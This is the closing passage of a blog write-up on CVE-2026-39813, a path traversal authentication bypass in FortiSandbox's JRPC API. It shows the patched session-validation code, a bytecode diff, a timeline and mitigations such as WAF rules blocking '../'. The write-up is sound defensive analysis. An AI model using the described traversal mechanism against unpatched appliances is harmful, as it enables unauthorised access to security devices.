</pre></td><td class="rouge-code"><pre><span class="c1"># Fixed is_valid_session() in 4.4.9
</span><span class="k">def</span> <span class="nf">is_valid_session</span><span class="p">(</span><span class="n">session_id</span><span class="p">,</span> <span class="n">remote_ip</span><span class="p">):</span>
    <span class="n">md5_pattern</span> <span class="o">=</span> <span class="sh">'</span><span class="s">^[a-fA-F0-9]{32}$</span><span class="sh">'</span>
    <span class="n">is_md5</span> <span class="o">=</span> <span class="nf">bool</span><span class="p">(</span><span class="n">re</span><span class="p">.</span><span class="nf">match</span><span class="p">(</span><span class="n">md5_pattern</span><span class="p">,</span> <span class="nf">str</span><span class="p">(</span><span class="n">session_id</span><span class="p">)))</span>

    <span class="k">if</span> <span class="ow">not</span> <span class="n">is_md5</span><span class="p">:</span>
        <span class="k">return</span> <span class="bp">False</span>  <span class="c1"># Only allow 32-character hex strings
</span>
    <span class="n">fpath</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="n">DIRRPCSESS</span><span class="p">,</span> <span class="n">session_id</span><span class="p">)</span>
    <span class="c1"># ... rest unchanged
</span></pre></td></tr></tbody></table></code></div></div>

<p>Bytecode-level diff confirms the change:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>4.4.8: Locals: 5  | Names: os, path, join, DIRRPCSESS, ...
4.4.9: Locals: 7  | Names: os, path, join, ..., bool, re, match, str
                     Constants: added '^[a-fA-F0-9]{32}$'
</pre></td></tr></tbody></table></code></div></div>

<p>This fix completely eliminates the attack vector — legitimate session IDs are generated by <code class="language-plaintext highlighter-rouge">secrets.token_hex(16)</code>, always producing 32-character hexadecimal strings that strictly match the regex pattern.</p>

<h2 id="timeline"><span class="me-2">Timeline</span><a href="#timeline" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Date</th>
      <th>Event</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>2026-04-14</td>
      <td>Fortinet publishes FG-IR-26-112 advisory</td>
    </tr>
    <tr>
      <td>2026-04-14</td>
      <td>CVE-2026-39808 (FG-IR-26-111) also disclosed</td>
    </tr>
    <tr>
      <td>2026-04-21</td>
      <td>Firmware reverse engineering and vulnerability reproduction</td>
    </tr>
    <tr>
      <td>2026-04-22</td>
      <td>Independent verification that 4.4.9 patch is effective</td>
    </tr>
  </tbody>
</table></div>

<h2 id="mitigation"><span class="me-2">Mitigation</span><a href="#mitigation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ol>
  <li><strong>Upgrade immediately</strong> to FortiSandbox 4.4.9 or 5.0.6+</li>
  <li>If immediate upgrade is not possible:
    <ul>
      <li>Block JRPC requests containing <code class="language-plaintext highlighter-rouge">../</code> via WAF rules</li>
      <li>Restrict network access to <code class="language-plaintext highlighter-rouge">/jsonrpc/</code> endpoint (trusted IPs only)</li>
    </ul>
  </li>
  <li>Audit logs for anomalous <code class="language-plaintext highlighter-rouge">/jsonrpc/</code> requests</li>
</ol>

<h2 id="conclusion"><span class="me-2">Conclusion</span><a href="#conclusion" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>CVE-2026-39813 is a representative case of path traversal leading to authentication bypass — user-controlled input is passed to a path construction function without validation, allowing an attacker to construct arbitrary filesystem paths that pass the authentication check. The CVSS 9.1 rating reflects not only the breadth of information disclosed, but also the broader security implications of compromising a network security appliance.</p>

<p>This case demonstrates that even with a custom authentication mechanism in place, the overall security architecture cannot be assured without foundational input validation.</p>

<h2 id="references"><span class="me-2">References</span><a href="#references" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ul>
  <li><a href="https://www.fortiguard.com/psirt/FG-IR-26-112">Fortinet PSIRT Advisory FG-IR-26-112</a></li>
  <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39813">NVD CVE-2026-39813</a></li>
</ul>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/vulnerability/">vulnerability</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/cve/"
            class="post-tag no-text-decoration"
          >CVE</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=CVE-2026-39813%20Deep%20Dive%20Path%20Traversal%20Authentication%20Bypass%20in%20FortiSandbox%20JRPC%20API%20-%20imjdl%20blog&url=%2Fposts%2Fblog_cve_2026_39813_en%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=CVE-2026-39813%20Deep%20Dive%20Path%20Traversal%20Authentication%20Bypass%20in%20FortiSandbox%20JRPC%20API%20-%20imjdl%20blog&u=%2Fposts%2Fblog_cve_2026_39813_en%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=%2Fposts%2Fblog_cve_2026_39813_en%2F&text=CVE-2026-39813%20Deep%20Dive%20Path%20Traversal%20Authentication%20Bypass%20in%20FortiSandbox%20JRPC%20API%20-%20imjdl%20blog" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2026_12569_cn/">CVE-2026-12569 深度分析：PTC Windchill 未授权反序列化 RCE</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2026_12569_en/">CVE-2026-12569 Deep Dive Unauthenticated Deserialization RCE in PTC Windchill</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2025_11837_cn/">CVE-2025-11837 深度分析：QNAP Malware Remover Python 代码注入漏洞</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2025_11837_en/">CVE-2025-11837 Deep Dive Python Code Injection Vulnerability in QNAP Malware Remover</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_backup_decryption_cn/">FortiSandbox 备份配置文件解密：固件逆向发现硬编码加密密钥</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cve/">CVE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/rce/">RCE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/%E7%A9%BA%E9%97%B4%E6%B5%8B%E7%BB%98/">空间测绘</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/fortigate/">Fortigate</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ivanti/">IVanti</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/mcp/">MCP</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/palo-alto-networks-pan-os/">Palo-Alto-Networks-PAN-OS</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/showdoc/">ShowDoc</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/simplehelp/">SimpleHelp</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/blog_cve_2026_12569_en/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1783485240"
  data-df="ll"
  
>
  Jul  8, 2026
</time>

              <h4 class="pt-0 my-2">CVE-2026-12569 Deep Dive Unauthenticated Deserialization RCE in PTC Windchill</h4>
              <div class="text-muted">
                <p>Background

First, a word on the product. PTC Windchill is a product lifecycle management (PLM) system used in manufacturing and heavy industry, managing the full data chain from design through eng...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/blog_cve_2026_12569_cn/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1783485240"
  data-df="ll"
  
>
  Jul  8, 2026
</time>

              <h4 class="pt-0 my-2">CVE-2026-12569 深度分析：PTC Windchill 未授权反序列化 RCE</h4>
              <div class="text-muted">
                <p>背景

先介绍这个产品。PTC Windchill 是一套产品生命周期管理（PLM）系统，用在制造业和重工业领域，管理从设计、工程到生产的完整数据链条——CAD 图纸、物料清单（BOM）、变更记录、零部件文档都归它管。它服务的企业大多是航空航天、汽车、重型机械、国防承包商这类，设计图纸和工程数据属于核心机密，所以这套系统一旦被打穿，泄露的就是企业的研发命脉。Windchill 体型庞大，前端...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/blog_cve_2025_11837_en/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1782102840"
  data-df="ll"
  
>
  Jun 22, 2026
</time>

              <h4 class="pt-0 my-2">CVE-2025-11837 Deep Dive Python Code Injection Vulnerability in QNAP Malware Remover</h4>
              <div class="text-muted">
                <p>Background

CVE-2025-11837 affects QNAP Malware Remover. It carries a CVSS 9.8 score and is tagged as network-reachable, no authentication required, no user interaction. The vulnerability was first...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/blog_cve_2026_39813_cn/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>CVE-2026-39813 深度分析：FortiSandbox JRPC API 路径遍历认证绕过</p>
    </a>
  

  
    <a
      href="/posts/blog_backup_decryption_cn/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>FortiSandbox 备份配置文件解密：固件逆向发现硬编码加密密钥</p>
    </a>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2026</time>

    
      <a href="https://twitter.com/Mortyjin">Mortyjin</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cve/">CVE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/rce/">RCE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/%E7%A9%BA%E9%97%B4%E6%B5%8B%E7%BB%98/">空间测绘</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/fortigate/">Fortigate</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ivanti/">IVanti</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/mcp/">MCP</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/palo-alto-networks-pan-os/">Palo-Alto-Networks-PAN-OS</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/showdoc/">ShowDoc</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/simplehelp/">SimpleHelp</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

